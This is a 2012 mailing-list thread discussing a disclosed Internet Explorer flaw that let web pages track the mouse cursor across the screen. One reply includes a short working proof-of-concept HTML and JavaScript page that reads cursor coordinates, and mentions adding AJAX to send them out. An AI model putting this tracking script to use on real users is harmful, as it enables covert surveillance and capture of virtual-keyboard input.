Hans-Christian Andersen
hans.andersen at phulse.com
Thu Dec 13 14:36:33 CST 2012
> The choice now is either stop using all tablets and Smartphones or stop
> using IE until a universal fix is built and distributed. Better safe than
> sorry.
All tablets and smartphones?
- Hans
On 2012-12-13, at 12:32 PM, "Jim Lawrence" <accessd at shaw.ca> wrote:
> You mean this demo?
>
> <!DOCTYPE html>
> <html>
> <head>
> <meta charset="utf-8" />
> <title>Exploit Demo</title>
> <script type="text/javascript">
> window.attachEvent("onload", function() {
> var detector = document.getElementById("detector");
> detector.attachEvent("onmousemove", function (e) {
> detector.innerHTML = e.screenX + ", " + e.screenY;
> });
> setInterval(function () {
> detector.fireEvent("onmousemove");
> }, 100);
> });
> </script>
> </head>
> <body>
> <div id="detector"></div>
> </body>
> </html>
>
> These type of compromise should be out there so everyone knows them, as rest
> assured, every person in the malware business is already fully versed in
> this exploit. Really it is only four to five lines of code and not
> particularly difficult code. You would have to add an AJAX piece of code
> collect the positions remotely of course but that would also be less than
> ten lines of additional code; four lines if you have attached the JQuery
> library.
>
> The choice now is either stop using all tablets and Smartphones or stop
> using IE until a universal fix is built and distributed. Better safe than
> sorry.
>
> Jim
>
> -----Original Message-----
> From: dba-tech-bounces at databaseadvisors.com
> [mailto:dba-tech-bounces at databaseadvisors.com] On Behalf Of Hans-Christian
> Andersen
> Sent: Thursday, December 13, 2012 1:18 AM
> To: Discussion of Hardware and Software issues
> Subject: [dba-Tech] Internet Explorer Data Leakage (versions 6 to 10)
>
>
> http://spider.io/blog/2012/12/internet-explorer-data-leakage/
>
> This is a pretty severe security issue. All it takes is a little bit of
> javascript on any site you visit and they are able to fully track where your
> mouse is on your screen (even when IE is minimized). All versions of IE are
> vulnerable to this starting from IE 6. It's already being exploited in the
> wild.
>
> There is a demo included as a link, if you want to test this out yourself.
>
> - Hans
>
>
> Excerpt from link:
> _______________
>
> "On the 1st of October, 2012, we disclosed to Microsoft the following
> security vulnerability in Internet Explorer, versions 6-10, which allows
> your mouse cursor to be tracked anywhere on the screen-even if the Internet
> Explorer window is minimised. The vulnerability is particularly troubling
> because it compromises the security of virtual keyboards and virtual
> keypads.
>
> The motivation for using a virtual keyboard is typically that it reduces the
> chance of a keylogger recording one's keypresses and thereby compromising
> one's passwords or credit card details. (c.f. bit.ly/YnNBYE; bit.ly/VpapWf)
>
> Whilst the Microsoft Security Research Center has acknowledged the
> vulnerability in Internet Explorer, they have also stated that there are no
> immediate plans to patch this vulnerability in existing versions of the
> browser. It is important for users of Internet Explorer to be made aware of
> this vulnerability and its implications.
>
> The vulnerability is already being exploited by at least two display ad
> analytics companies across billions of page impressions per month."
>
>
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com
>
> _______________________________________________
> dba-Tech mailing list
> dba-Tech at databaseadvisors.com
> http://databaseadvisors.com/mailman/listinfo/dba-tech
> Website: http://www.databaseadvisors.com